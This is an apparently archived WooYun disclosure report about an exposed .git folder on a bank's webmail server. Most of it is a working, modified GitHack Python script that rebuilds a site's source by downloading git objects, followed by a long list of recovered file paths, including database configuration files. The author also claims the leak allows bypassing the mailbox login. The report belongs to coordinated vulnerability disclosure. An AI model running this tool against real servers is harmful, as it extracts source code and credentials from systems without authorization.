漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0167084
漏洞标题:湘潭农商银行邮服务运维配置不当导致敏感信息泄露
相关厂商:cncert国家互联网应急中心
漏洞作者: 路人甲
提交时间:2016-01-05 00:46
修复时间:2016-02-20 15:48
公开时间:2016-02-20 15:48
漏洞类型:系统/服务运维配置不当
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-01-05: 细节已通知厂商并且等待厂商处理中
2016-01-08: 厂商已经确认,细节仅向厂商公开
2016-01-18: 细节向核心白帽子及相关领域专家公开
2016-01-28: 细节向普通白帽子公开
2016-02-07: 细节向实习白帽子公开
2016-02-20: 细节向公众公开
简要描述:
RT
详细说明:
应该是修复了有的下载不了
http://**.**.**.**/.git/config
http://**.**.**.**/.git/config
不过还是可以看到源码里面密码配置什么的然而这没什么卵用。。有的是内网密码什么的。对那些不感兴趣。。
githack。这个脚本大家都用过。总觉得不爽修改了下代码。把不管能不能下载的文件。都把文件路径输出保存。然后遇见扫
表示可以直接绕过登录进邮箱还有更多铭感信。。笔记本截不了图。
漏洞证明:
脚本 会保存路径文件名在当前目录
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
import sys
import urllib2
import os
import urlparse
import zlib
import threading
import Queue
import re
import time
from lib.parser import parse
if len(sys.argv) == 1:
msg = """
A `.git` folder disclosure exploit. By LiJieJie
Usage: GitHack.py http://**.**.**.**/.git/
bug-report: my[at]**.**.**.** (http://www.**.**.**.**)
"""
print msg
sys.exit(0)
class Scanner(object):
def __init__(self):
self.base_url = sys.argv[-1]
self.domain = urlparse.urlparse(sys.argv[-1]).netloc.replace(':', '_')
if not os.path.exists(self.domain):
os.mkdir(self.domain)
print '[+] Download and parse index file ...'
data = self._request_data(sys.argv[-1] + '/index')
with open('index', 'wb') as f:
f.write(data)
self.queue = Queue.Queue()
for entry in parse('index'):
if "sha1" in entry.keys():
self.queue.put((entry["sha1"].strip(), entry["name"].strip()))
print entry['name']
self.lock = threading.Lock()
self.thread_count = 20
self.STOP_ME = False
def _request_data(self, url):
request = urllib2.Request(url, None, {'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)'})
return urllib2.urlopen(request).read()
def _print(self, msg):
self.lock.acquire()
print msg
self.lock.release()
def get_back_file(self):
while not self.STOP_ME:
try:
sha1, file_name = self.queue.get(timeout=0.5)
except:
break
for i in range(3):
try:
folder = '/objects/%s/' % sha1[:2]
data = self._request_data(self.base_url + folder + sha1[2:])
data = zlib.decompress(data)
data = re.sub('blob \d+\00', '', data)
target_dir = os.path.join(self.domain, os.path.dirname(file_name) )
if target_dir and not os.path.exists(target_dir):
os.makedirs(target_dir)
with open( os.path.join(self.domain, file_name) , 'wb') as f:
f.write(data)
fs = open('wooyun.txt','a')
fs.write(file_name+'\n')
fs.close()
self._print('[OK] %s' % file_name)
break
except urllib2.HTTPError, e:
if str(e).find('HTTP Error 404') >=0:
fc = open('wooyuns.txt','a')
fc.write(file_name+'\n')
fc.close()
self._print('[File not found] %s' % file_name)
break
except Exception, e:
fa = open('wooyunss.txt','a')
fa.write(file_name+'\n')
fa.close()
self._print('[Error] %s' % e)
self.exit_thread()
def exit_thread(self):
self.lock.acquire()
self.thread_count -= 1
self.lock.release()
def scan(self):
for i in range(self.thread_count):
t = threading.Thread(target=self.get_back_file)
t.start()
s = Scanner()
s.scan()
try:
while s.thread_count > 0:
time.sleep(0.1)
except KeyboardInterrupt, e:
s.STOP_ME = True
time.sleep(1.0)
print 'User Aborted.'
/
/.project
/api/netaddr/ipcheck.inc.php
/core/ModifyTableStructure.php
/core/UpdateUserPassword.php
/core/letter.class.php
/changeLogs.txt
/conf/db.inc.php
/conf/db_remote.inc.php
/core/IPhoneConfig.inc.php
/core/PasswordPanduan.class.php
/core/template.inc.php
/core/verpic.php
/download.php
/cpuAvg.txt
/freemail/3G
/favicon.ico
/freemail/api
/freemail/antivirus
/freemail/config/db.inc.php
/freemail/config/dbconfig.inc.php
/freemail/config/dbremote.inc.php
/freemail/config/mobile_config.inc.php
/freemail/editor
/freemail/help
/freemail/index.php
/freemail/images
/freemail/include
/freemail/login.php
/freemail/language
/freemail/logout.php
/freemail/main
/freemail/mobile
/freemail/script
/freemail/setting
/freemail/temp
/freemail/template
/freemail/tools
/freemail/vip
/i.php
/index.php2
/getdomain.php
/mailcontrol/DateTime.php
/mailcontrol/BackFileDelete.sh.php
/mailcontrol/FileDelete.php
/mailcontrol/H23TruncateMailFailRecord.sh
/mailcontrol/H23TruncateMailFailRecord.sh.php
/mailcontrol/MergerAddress.php
/mailcontrol/SendM**.**.**.**
/mailcontrol/addRecordTable.php
/mailcontrol/addTable.php
/mailcontrol/addtmtable.php
/mailcontrol/alertMailFolder.php
/mailcontrol/alterTable.php
/mailcontrol/api/netaddr/ipcheck.inc.php
/mailcontrol/api/xml/xmlbase.inc.php
/mailcontrol/api/xml/xmlserver.inc.php
/mailcontrol/autoAlterTable.php
/mailcontrol/checkForward.php
/mailcontrol/command.php
/mailcontrol/dir_create.php
/mailcontrol/dir_check.php
/mailcontrol/i.php
/mailcontrol/index.php
/mailcontrol/log
/mailcontrol/linux.php
/mailcontrol/mailSendRecord.php
/mailcontrol/mail_**.**.**.**
/mailcontrol/mailtest.php
/mailcontrol/mx_server.list
/mailcontrol/mailtest606.php
/mailcontrol/mysqltest.php
/mailcontrol/recordCheck.inc.php
/mailcontrol/removefloder.php
/mailcontrol/security.inc.php
/mailcontrol/securityrsa.inc.php
/mailcontrol/sendAll.php
/mailcontrol/table_alert.php
/mailcontrol/tarWebmail.php
/mailcontrol/tempTablealert.php
/mailcontrol/tempTablecreate.php
/mailcontrol/test.php
/mailcontrol/test1.php
/mailcontrol/testmail.php
/mailcontrol/todaymail/todaymail_restore.inc.php
/mailcontrol/todaymail/todaymail_upgrade.inc.php
/mailcontrol/todaymail_dir.php
/mailcontrol/todaymail_log.php
/mailcontrol/todaymail_out.php
/mailcontrol/update_result.php
/mailcontrol/upgrade.php
/mailcontrol/updatedb.php
/mailcontrol/webmail_upgrade.php
/mobile/api
/mobile/core
/mobile/help/images/2.jpg
/mobile/help/images/3.jpg
/mobile/help/images/1.jpg
/mobile/help/images/4.jpg
/mobile/help/images/6.jpg
/mobile/help/images/5.jpg
/mobile/images/Thumbs.db
/mobile/help/images/7.jpg
/mobile/images/arrow1.gif
/mobile/images/arrow.gif
/mobile/images/delete.png
/mobile/images/clip.gif
/mobile/images/arrowred.gif
/mobile/images/down.gif
/mobile/images/logo.gif
/mobile/images/math.gif
/mobile/images/newmail.gif
/mobile/images/open.gif
/mobile/images/todaymail.gif
/mobile/index.php
/mobile/language/utf8_big.inc.php
/mobile/index_i.php
/mobile/language/utf8_en.inc.php
/mobile/language/utf8_gb.inc.php
/mobile/language/utf8_inc.php
/mobile/manager/mimeType.php
/mobile/manager/logout.php
/mobile/manager/security.inc.php
/mobile/manager/test.php
/mobile/share/bak/nowMobi.2008-04-28.css
/mobile/share/bak/nowMobi_2008-04-23.css
/mobile/share/footer.inc.php
/mobile/share/nowMobi.css
/mobile/share/top.inc.php
/mobile/test.php
/mobile/testindex.php
/readme.txt
/routin/H2OverdueMFilterTempDelete.sh.php
/routin/H3BackFileDelete.sh
/routin/hour.sh.php
/routin/minute.sh.php
/routin/day.sh.php
/routin/moveDate.php
/
/routin/runtime.inc.php
/routin/week.sh.php
/system/hdcheck.sh
/system/checkport.sh
/serverstatus.php
/system/OverdueMFilterTempDelete.sh.php
/system/i.php
/touch/core
/touch/api
/
/webmail/api/htmledit/editorV10_old/_source/plugins/wsc/dialogs/ciframe.html
/webmail/api/htmledit/editorV10_old/_source/plugins/wsc/dialogs/tmpFrameset.html
/
/webmail/api/htmledit/editorV10_old/ckeditor.asp
/webmail/api/htmledit/editorV10_old/ckeditor.pack
/webmail/api/htmledit/editorV10_old/ckeditor.js
/webmail/api/htmledit/editorV10_old/ckeditor.php
/webmail/api/htmledit/editorV10_old/ckeditor_basic_source.js
/webmail/api/htmledit/editorV10_old/ckeditor_basic.js
/webmail/api/htmledit/editorV10_old/ckeditor_php4.php
/webmail/api/htmledit/editorV10_old/ckeditor_source.js
/webmail/api/htmledit/editorV10_old/ckeditor_php5.php
/webmail/api/htmledit/editorV10_old/config1.js
/webmail/api/htmledit/editorV10_old/config.js
/webmail/api/htmledit/editorV10_old/contents.css
/webmail/api/htmledit/editorV10_old/images/spacer.gif
/webmail/api/htmledit/editorV10_old/lang/_translationstatus.txt
/webmail/api/htmledit/editorV10_old/plugins/a11yhelp/lang/_translationstatus.txt
/webmail/api/htmledit/editorV10_old/plugins/preview/preview.html
/webmail/api/htmledit/editorV10_old/plugins/wsc/dialogs/ciframe.html
/webmail/api/htmledit/editorV10_old/plugins/wsc/dialogs/tmpFrameset.html
/webmail/api/htmledit/xml/xmlbase.inc.php
/webmail/api/sfun/domainsec.inc.php
/webmail/config/db_sms.inc.php
/webmail/config/dbconfig.inc.php
/webmail/config/dbconfig.inc.php.now
/webmail/config/mobile_config.inc.php
/webmail/css/bulkupload.css
/webmail/css/cross.png
/webmail/css/dialog_simp.css
/webmail/css/loading.gif
/webmail/css/gb_tip_layer_ie6.png
/webmail/css/googlead5.js
/webmail/css/msg_img/btns.png
/webmail/css/msg_img/chrome_s.png
/webmail/css/msg_img/loading.gif
/webmail/css/msg_img/loading_d.gif
/webmail/css/msg_img/icons.png
/webmail/css/msg_img/chrome_s_1.png
/webmail/css/msg_img/msg.png
/webmail/css/msg_img/msg_bg.png
/webmail/defaultnovip/css/script.js
/webmail/defaultnovip/css/style.css
/webmail/defaultnovip/images/Thumbs.db
/webmail/defaultnovip/images/anti_spam1.gif
/webmail/help/Mail client.html
/webmail/help/antispam.htm
/webmail/download.php
/webmail/help/antispam.html
/webmail/help/Mail client_fan.html
/webmail/help/antivirus.html
/webmail/help/changelog.htm
/webmail/help/changelog.html
/webmail/help/fanbing.htm
/webmail/help/helpbig.html
/webmail/help/helpbig_android.html
/webmail/help/helpbig_imap_android.html
/webmail/help/helpbig_imap_foxmail.html
/webmail/help/helpbig_imap_iphone.html
/webmail/help/helpbig_imap_outlook.html
/webmail/help/helpbig_iphone.html
/webmail/help/helpbig_mobile.html
/webmail/help/helpbig_reemail.html
/webmail/help/helpbig_wm.html
/webmail/help/helpen.html
/webmail/help/helpen_imap_iphone.html
/webmail/help/helpen_imap_foxmail.html
/webmail/help/helpen_imap_outlook.html
/webmail/help/helpen_pop_iphone.html
/webmail/help/helpen_pop_outlook.html
/webmail/help/helpgb.html
/webmail/help/helpgb_android.html
/webmail/help/helpgb_imap_android.html
/webmail/help/helpgb_imap_iphone.html
/webmail/help/helpgb_imap_foxmail.html
/webmail/help/helpgb_imap_outlook.html
/webmail/help/helpgb_iphone.html
/webmail/help/helpgb_mobile.html
/webmail/help/helpgb_reemail.html
/webmail/help/helpgb_wm.html
/webmail/help/images/antispam_01.gif
/webmail/help/images/antispam_03.gif
/webmail/help/images/antispam_02.gif
/webmail/help/iOS.html
/webmail/images/letter/autumn/autumn/index.html
/webmail/images/letter/autumn/autumn/pre.jpg
/webmail/images/letter/autumn/autumn1/index.html
/webmail/images/letter/autumn/autumn1/pre.jpg
/webmail/images/letter/autumn/autumn2/images/xieyi_A_1.jpg
/webmail/images/letter/autumn/autumn2/images/xieyi_A_2.jpg
/webmail/images/letter/autumn/autumn2/images/xieyi_A_3.jpg
/webmail/images/letter/autumn/autumn2/images/xieyi_A_4.jpg
/webmail/images/letter/autumn/autumn2/images/xieyi_A_5.jpg
/webmail/images/letter/autumn/autumn2/index.html
/webmail/images/letter/autumn/autumn2/images/xieyi_A_6.gif
/webmail/images/letter/autumn/autumn2/pre.jpg
/webmail/images/letter/autumn/orange/index.html
/webmail/images/letter/autumn/lemon_yyt/index.html
/webmail/images/letter/autumn/lemon_yyt/pre.jpg
/webmail/images/letter/autumn/tea/index.html
/webmail/images/letter/autumn/orange/pre.jpg
/webmail/images/letter/business/blue/blue_01.jpg
/webmail/images/letter/autumn/tea/pre.jpg
/webmail/images/letter/business/blue/blue_02.jpg
/webmail/images/letter/business/blue/blue_03.jpg
/webmail/images/letter/business/blue/index.html
/webmail/images/letter/business/blue/pre.jpg
/webmail/images/letter/business/business/images/lotus_b_bg1.jpg
/webmail/images/letter/business/business/images/lotus_b_bg2.jpg
/webmail/images/letter/business/business/images/lotus_b_top.jpg
/webmail/images/letter/business/business/images/lotus_b_bottom.jpg
/webmail/images/letter/business/business/index.html
/webmail/images/letter/business/gray/index.html
/webmail/images/letter/business/business/pre.jpg
/webmail/images/letter/business/gray/pre.jpg
/webmail/images/letter/business/gray2/Thumbs.db
/webmail/images/letter/business/gray2/index.html
/webmail/images/letter/business/gray2/pre.jpg
/webmail/images/letter/business/gray3/index.html
/webmail/api/htmledit/editorV10_old/plugins/showblocks/images/block_pre.png
/webmail/images/letter/business/gray3/pre.jpg
/webmail/images/letter/business/white/index.html
/webmail/images/letter/business/white/pre.jpg
/webmail/images/letter/business/white2/index.html
/webmail/images/letter/business/white3/index.html
/webmail/images/letter/business/white2/pre.jpg
/webmail/images/letter/business/white3/pre.jpg
/webmail/images/letter/cartoon/cartoon/index.html
/webmail/images/letter/cartoon/cartoon/pre.jpg
/webmail/images/letter/cartoon/cartoon2/index.html
/webmail/images/letter/cartoon/cartoon3/index.html
/webmail/images/letter/cartoon/cartoon3/pre.jpg
/webmail/images/letter/cartoon/cartoon2/pre.jpg
/webmail/images/letter/cartoon/cartoon4/images/huang_pic2.jpg
/webmail/images/letter/cartoon/cartoon4/images/huang_pic1.jpg
/webmail/images/letter/cartoon/cartoon4/images/huang_pic3.jpg
/webmail/images/letter/cartoon/cartoon4/images/huang_pic6.jpg
/webmail/images/letter/cartoon/cartoon4/images/huang_pic4.jpg
/webmail/images/letter/cartoon/cartoon4/images/huang_pic5.jpg
/webmail/images/letter/cartoon/cartoon4/images/huang_pic7.jpg
/webmail/images/letter/cartoon/cartoon4/index.html
/webmail/images/letter/cartoon/cartoon4/pre.jpg
/webmail/images/letter/cartoon/cartoon5/images/season_b_bg1.png
/webmail/images/letter/cartoon/cartoon5/images/season_b_bg2.png
/webmail/images/letter/cartoon/cartoon5/images/season_b_bg3.png
/webmail/images/letter/cartoon/cartoon5/images/season_b_bg4.jpg
/webmail/images/letter/cartoon/cartoon5/images/season_b_pic2.jpg
/webmail/images/letter/cartoon/cartoon5/images/season_b_pic1.jpg
/webmail/images/letter/cartoon/cartoon5/index.html
/webmail/images/letter/cartoon/cartoon5/pre.jpg
/webmail/images/letter/cartoon/cartoon5/images/season_b_pic3.jpg
/webmail/images/letter/cartoon/cartoon6/images/starry_b_bg1.png
/webmail/images/letter/cartoon/cartoon6/images/starry_b_pic1.png
/webmail/images/letter/cartoon/cartoon6/images/starry_b_bg2.png
/webmail/images/letter/cartoon/cartoon6/images/starry_b_bg3.png
/webmail/images/letter/cartoon/cartoon6/images/starry_b_pic2.png
/webmail/api/htmledit/editorV10_old/plugins/specialchar/lang/fi.js
/webmail/images/letter/cartoon/cartoon6/index.html
/webmail/images/letter/cartoon/cartoon6/pre.jpg
/webmail/images/letter/flowers/flower/index.html
/webmail/images/letter/flowers/flower2/index.html
/webmail/images/letter/flowers/flower2/pre.jpg
/webmail/images/letter/flowers/flower/pre.jpg
/webmail/images/letter/flowers/flower3/index.html
/webmail/images/letter/flowers/flower4/pre.jpg
/webmail/images/letter/flowers/flower4/index.html
/webmail/images/letter/flowers/flower5/pre.jpg
/webmail/images/letter/flowers/flower5/index.html
/webmail/images/letter/flowers/flower3/pre.jpg
/webmail/images/letter/flowers/flower6/index.html
/webmail/images/letter/flowers/flower6/pre.jpg
/webmail/images/letter/flowers/flower7/images/flower_A_1.jpg
/webmail/images/letter/flowers/flower7/images/flower_A_2.jpg
/webmail/images/letter/flowers/flower7/images/flower_A_3.jpg
/webmail/images/letter/flowers/flower7/images/flower_A_4.gif
/webmail/images/letter/flowers/flower7/index.html
/webmail/images/letter/flowers/flower7/pre.jpg
/webmail/images/letter/flowers/flower8/images/goldfish_seem_01.jpg
/webmail/images/letter/flowers/flower8/images/goldfish_seem_02.jpg
/webmail/images/letter/flowers/flower8/index.html
/webmail/images/letter/flowers/flower8/pre.jpg
/webmail/images/letter/nonuse_big.gif
/webmail/images/letter/nonuse_en.gif
/webmail/images/letter/nonuse_gb.gif
/webmail/images/letter/sky/sky/index.html
/webmail/images/letter/sky/sky/pre.jpg
/webmail/images/letter/sky/sky2/index.html
/webmail/images/letter/sky/sky2/pre.jpg
/webmail/images/letter/sky/sky3/index.html
/webmail/images/letter/sky/sky3/pre.jpg
/webmail/images/letter/sky/sky4/index.html
/webmail/images/letter/sky/sky5/images/miss_A_1.jpg
/webmail/images/letter/sky/sky4/pre.jpg
/webmail/images/letter/sky/sky5/images/miss_A_3.jpg
/webmail/images/letter/sky/sky5/images/miss_A_2.jpg
/webmail/images/letter/sky/sky5/images/miss_A_4.jpg
/webmail/images/letter/sky/sky5/images/miss_A_5.gif
/webmail/images/letter/sky/sky5/index.html
/webmail/images/letter/sky/sky6/images/winter_b_bg1.jpg
/webmail/images/letter/sky/sky5/pre.jpg
/webmail/images/letter/sky/sky6/images/winter_b_bg2.png
/webmail/images/letter/sky/sky6/images/winter_b_pic.jpg
/webmail/images/letter/sky/sky6/index.html
/webmail/images/letter/sky/sky6/pre.jpg
/webmail/images/letter/sky/sky7/images/balloon_b_top.jpg
/webmail/images/letter/sky/sky7/index.html
/webmail/images/letterold/Blessing/flower_A/index.html
/webmail/images/letter/sky/sky7/pre.jpg
/webmail/images/letterold/Blessing/girl_shang/index.html
/webmail/images/letterold/Blessing/flower_A/pre.jpg
/webmail/images/letterold/Blessing/girl_shang/pre.jpg
/webmail/images/letterold/Blessing/lemon_qcl/index.html
/webmail/images/letterold/Blessing/lemon_qcl/pre.jpg
/webmail/images/letterold/Blessing/rainbow/index.html
/webmail/images/letterold/Blessing/rainbow/pre.jpg
/webmail/images/letterold/Blessing/sha_xia/index.html
/webmail/images/letterold/Blessing/sha_xia/pre.jpg
/webmail/images/letterold/Blessing/snowman/index.html
/webmail/images/letterold/Blessing/snowman/pre.jpg
/webmail/images/letterold/Blessing/wwf1/index.html
/webmail/images/letterold/Blessing/wwf1/pre.jpg
/webmail/images/letterold/autumn/autumn/index.html
/webmail/images/letterold/autumn/autumn1/index.html
/webmail/images/letterold/autumn/autumn1/pre.jpg
/webmail/images/letterold/autumn/autumn/pre.jpg
/webmail/images/letterold/autumn/lemon_yyt/pre.jpg
/webmail/images/letterold/autumn/lemon_yyt/index.html
/webmail/images/letterold/autumn/orange/pre.jpg
/webmail/images/letterold/autumn/orange/index.html
/webmail/images/letterold/autumn/tea/index.html
/webmail/images/letterold/autumn/tea/pre.jpg
/webmail/images/letterold/business/blue/index.html
/webmail/images/letterold/business/gray2/index.html
/webmail/images/letterold/business/gray/index.html
/webmail/images/letterold/business/gray/pre.jpg
/webmail/images/letterold/business/gray2/pre.jpg
/webmail/images/letterold/business/gray3/index.html
/webmail/images/letterold/business/white/index.html
/webmail/images/letterold/business/white/pre.jpg
/webmail/images/letterold/business/white2/index.html
/webmail/images/letterold/business/white2/pre.jpg
/webmail/images/letterold/business/white3/index.html
/webmail/images/letterold/business/white3/pre.jpg
/webmail/images/letterold/cartoon/cartoon/pre.jpg
/webmail/images/letterold/cartoon/cartoon/index.html
/webmail/images/letterold/cartoon/cartoon2/pre.jpg
/webmail/images/letterold/cartoon/cartoon2/index.html
/webmail/images/letterold/cartoon/cartoon3/index.html
/webmail/images/letterold/cartoon/cartoon3/pre.jpg
/webmail/images/letterold/flowers/flower/index.html
/webmail/images/letterold/flowers/flower/pre.jpg
/webmail/api/htmledit/xml/xmlclient.inc.php.bak
/webmail/images/letterold/flowers/flower2/index.html
/webmail/images/letterold/flowers/flower2/pre.jpg
/webmail/images/letterold/flowers/flower3/index.html
/webmail/images/letterold/flowers/flower4/index.html
/webmail/images/letterold/flowers/flower4/pre.jpg
/webmail/images/letterold/flowers/flower3/pre.jpg
/webmail/images/letterold/flowers/flower5/index.html
/webmail/images/letterold/flowers/flower5/pre.jpg
/webmail/images/letterold/flowers/flower6/index.html
/webmail/images/letterold/flowers/flower6/pre.jpg
/webmail/images/letterold/nonuse_big.gif
/webmail/images/letterold/nonuse_gb.gif
/webmail/images/letterold/nonuse_en.gif
/webmail/images/letterold/simple/books/pre.jpg
/webmail/images/letterold/simple/books/index.html
/webmail/images/letterold/simple/guocui/index.html
/webmail/images/letterold/simple/guocui/pre.jpg
/webmail/images/letterold/simple/lemon_mo/index.html
/webmail/images/letterold/simple/lemon_mo/pre.jpg
/webmail/images/letterold/simple/lemon_yyt/pre.jpg
/webmail/images/letterold/simple/wwf3/pre.jpg
/webmail/images/letterold/simple/lemon_yyt/index.html
/webmail/images/letterold/simple/wwf3/index.html
/webmail/css/msg_img/border.png
/webmail/images/letterold/sky/sky/index.html
/webmail/images/letterold/sky/sky2/index.html
/webmail/images/letterold/sky/sky/pre.jpg
/webmail/images/letterold/sky/sky2/pre.jpg
/webmail/images/letterold/sky/sky3/index.html
/webmail/images/letterold/sky/sky3/pre.jpg
/webmail/images/letterold/sky/sky4/pre.jpg
/webmail/images/letterold/sky/sky4/index.html
/webmail/images/letterold/work/lemon_gzjsb/index.html
/webmail/images/letterold/work/lemon_gzjsb/pre.jpg
/webmail/images/letterold/work/vk_bns/index.html
/webmail/images/letterold/work/vk_bns/pre.jpg
/webmail/images/letterold/young/youaremyhappy/index.html
/webmail/images/letterold/young/youaremyhappy/pre.jpg
/webmail/images/letterold/young/young/index.html
/webmail/images/loading.gif
/webmail/images/letterold/young/young/pre.jpg
/webmail/images/logo.gif
/webmail/images/loading2.gif
/webmail/images/logoNew.gif
/webmail/images/logo_login_new.png
/webmail/images/logoNew.png
/webmail/images/mail_elements.gif
/webmail/images/newMail.png
/webmail/images/notepad.gif
/webmail/images/outlook/en/e1.jpg
/webmail/images/outlook/en/e3.jpg
/webmail/images/outlook/en/e4.jpg
/webmail/images/outlook/en/e2.jpg
/webmail/images/outlook/en/e5.jpg
/webmail/images/outlook/en/e6.jpg
/webmail/images/outlook/en/e7.jpg
/webmail/images/outlook/en/e8.jpg
/webmail/images/outlook/en/e9.jpg
/webmail/images/outlook/en/o_e1.jpg
/webmail/images/outlook/en/o_e2.jpg
/webmail/images/outlook/en/o_e4.jpg
/webmail/images/outlook/en/o_e3.jpg
/webmail/images/outlook/en/o_e6.jpg
/webmail/images/outlook/en/o_e5.jpg
/webmail/images/outlook/en/o_e7.jpg
/webmail/images/outlook/gb/1.jpg
/webmail/images/outlook/en/o_e9.jpg
/webmail/images/outlook/en/o_e8.jpg
/webmail/images/outlook/gb/2.jpg
/webmail/images/outlook/gb/3.jpg
/webmail/images/outlook/gb/4.jpg
/webmail/images/outlook/gb/5.jpg
/webmail/images/outlook/gb/6.jpg
/webmail/images/outlook/gb/7.jpg
/webmail/images/outlook/gb/8.jpg
/webmail/images/pageclose.gif
/webmail/images/search_go.gif
/webmail/images/sjrz_ico.png
/webmail/images/search_en_go.gif
/webmail/images/outlook/gb/9.jpg
/webmail/images/sendBtn_bg.png
/webmail/images/top_bg.gif
/webmail/images/sendBtn_bg.gif
/webmail/images/spacer.gif
/webmail/images/toaddr.gif
/webmail/images/success.gif
/webmail/images/tools.jpg
/webmail/images/todaymail.gif
/webmail/images/top_bg_flowers.gif
/webmail/images/top_bg_spring.gif
/webmail/images/trash.gif
/webmail/imageshttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/**.**.**.**/**.**.**.**_logo.gif
/webmail/imageshttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/**.**.**.**/**.**.**.**_logo.gif
/webmail/imageshttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/**.**.**.**/**.**.**.**_logo.gif
/webmail/imageshttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/**.**.**.**/**.**.**.**_logo1.gif
/webmail/imageshttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/**.**.**.**/**.**.**.**_logo.gif
/webmail/imageshttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/**.**.**.**/**.**.**.**_logo2.gif
/webmail/imageshttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/**.**.**.**/now_**.**.**.**_logo.gif
/webmail/imageshttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/**.**.**.**/**.**.**.**_cn_logo.gif
/webmail/images/upload_1302082006/**.**.**.**/**.**.**.**_logo.gif
/webmail/images/upload_1309929021/**.**.**.**/**.**.**.**_logo.gif
/webmail/images/upload_1311572146/**.**.**.**/**.**.**.**_logo.gif
/webmail/imageshttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/**.**.**.**/**.**.**.**_logo.gif
/webmail/images/upload_1311572146/**.**.**.**/72a5edaea826f46183de600db0c7dbf8
/webmail/images/upload_1316664081/**.**.**.**/72a5edaea826f46183de600db0c7dbf8
/webmail/images/vir1.gif
/webmail/images/upload_1339384478/**.**.**.**/72a5edaea826f46183de600db0c7dbf8
/webmail/include/addr.inc.php
/webmail/include/emailshare.inc.php
/webmail/include/getPageList.inc.php
/webmail/include/forward.inc.php
/webmail/include/iphoneConfig.inc.php
/webmail/include/login_inc.php
/webmail/include/mailuser.inc.php
/webmail/include/mimeType.php
/webmail/include/reply_inc.php
/webmail/include/sms_fun.inc.php
/webmail/index.php
/webmail/main/Notepad.php
/webmail/main/VLevel/advadd.php
/webmail/main/VLevel/adv.php
/webmail/main/adv.php
/webmail/main/ajax_email.php
/webmail/main/buttonad.php
/webmail/main/attach.php
/webmail/main/attach_list.php
/webmail/main/commandforward.php
/webmail/main/demo.php
/webmail/main/fileList.php
/webmail/main/folder.php
/webmail/main/getPopMailBox.inc.php
/webmail/main/forward.php
/webmail/main/getSign.php
/webmail/main/getmx.php
/webmail/main/iphoneConfigFileCreate.php
/webmail/main/info.txt
/webmail/main/killselfsend.php
/webmail/main/letter.inc.php
/webmail/images/folder/address.gif
/webmail/main/login.php
/webmail/main/mailSendRecord.php
/webmail/main/mailTemp_re.php
/webmail/main/mailbox_rename.php
/webmail/main/mailbox_edit.php
/webmail/main/mailboxdetail.php
/webmail/main/other_email.php
/webmail/main/readlettertemplate.php
/webmail/main/reply.php
/webmail/main/report.php
/webmail/main/refreshlist.php
/webmail/main/returnReceipt.php
/webmail/main/returnReceiptSend.php
/webmail/main/send_ba.php
/webmail/main/searchAddr.inc.php
/webmail/images/folder/usrreg.gif
/webmail/main/send_error.php
/webmail/main/send_save.php
/webmail/main/sendagain.php
/webmail/main/uploadify/cancel.png
/webmail/main/uploadify/check.php
/webmail/main/uploadify/com__/adobe/crypto/HMAC.as
/webmail/main/uploadify/com__/adobe/air/logging/FileTarget.as
/webmail/main/uploadify/com__/adobe/crypto/MD5.as
/webmail/main/uploadify/com__/adobe/crypto/MD5Stream.as
/webmail/main/uploadify/com__/adobe/crypto/SHA1.as
/webmail/main/uploadify/com__/adobe/crypto/SHA256.as
/webmail/main/uploadify/com__/adobe/crypto/SHA224.as
/webmail/main/uploadify/com__/adobe/crypto/WSSEUsernameToken.as
/webmail/main/uploadify/com__/adobe/errors/IllegalStateError.as
/webmail/main/uploadify/com__/adobe/fileformats/vcard/Address.as
/webmail/main/uploadify/com__/adobe/fileformats/vcard/Email.as
/webmail/main/uploadify/com__/adobe/fileformats/vcard/Phone.as
/webmail/main/uploadify/com__/adobe/fileformats/vcard/VCard.as
/webmail/main/uploadify/com__/adobe/fileformats/vcard/VCardParser.as
/webmail/main/uploadify/com__/adobe/images/BitString.as
/webmail/main/uploadify/com__/adobe/images/JPGEncoder.as
/webmail/main/uploadify/com__/adobe/images/PNGEncoder.as
/webmail/main/uploadify/com__/adobe/net/DynamicURLLoader.as
/webmail/main/uploadify/com__/adobe/net/MimeTypeMap.as
/webmail/main/uploadify/com__/adobe/net/IURIResolver.as
/webmail/main/uploadify/com__/adobe/net/URI.as
/webmail/main/uploadify/com__/adobe/net/proxies/RFC2817Socket.as
/webmail/main/uploadify/com__/adobe/net/URIEncodingBitmap.as
/webmail/main/uploadify/com__/adobe/protocols/dict/Database.as
/webmail/main/uploadify/com__/adobe/protocols/dict/Definition.as
/webmail/main/uploadify/com__/adobe/protocols/dict/Dict.as
/webmail/main/uploadify/com__/adobe/protocols/dict/MatchStrategy.as
/webmail/main/uploadify/com__/adobe/protocols/dict/DictionaryServer.as
/webmail/main/uploadify/com__/adobe/protocols/dict/Response.as
/webmail/main/uploadify/com__/adobe/protocols/dict/events/ConnectedEvent.as
/webmail/main/uploadify/com__/adobe/protocols/dict/events/DatabaseEvent.as
/webmail/main/uploadify/com__/adobe/protocols/dict/events/DefinitionEvent.as
/webmail/main/uploadify/com__/adobe/protocols/dict/events/DefinitionHeaderEvent.as
/webmail/main/uploadify/com__/adobe/protocols/dict/events/DictionaryServerEvent.as
/webmail/main/uploadify/com__/adobe/protocols/dict/events/ErrorEvent.as
/webmail/main/uploadify/com__/adobe/protocols/dict/events/DisconnectedEvent.as
/webmail/images/help/kill2.gif
/webmail/main/uploadify/com__/adobe/protocols/dict/events/MatchEvent.as
/webmail/main/uploadify/com__/adobe/protocols/dict/events/NoMatchEvent.as
/webmail/main/uploadify/com__/adobe/protocols/dict/events/MatchStrategiesEvent.as
/webmail/images/help/ipmail6.jpg
/webmail/images/help/ipmail3.jpg
/webmail/main/uploadify/com__/adobe/protocols/dict/util/CompleteResponseEvent.as
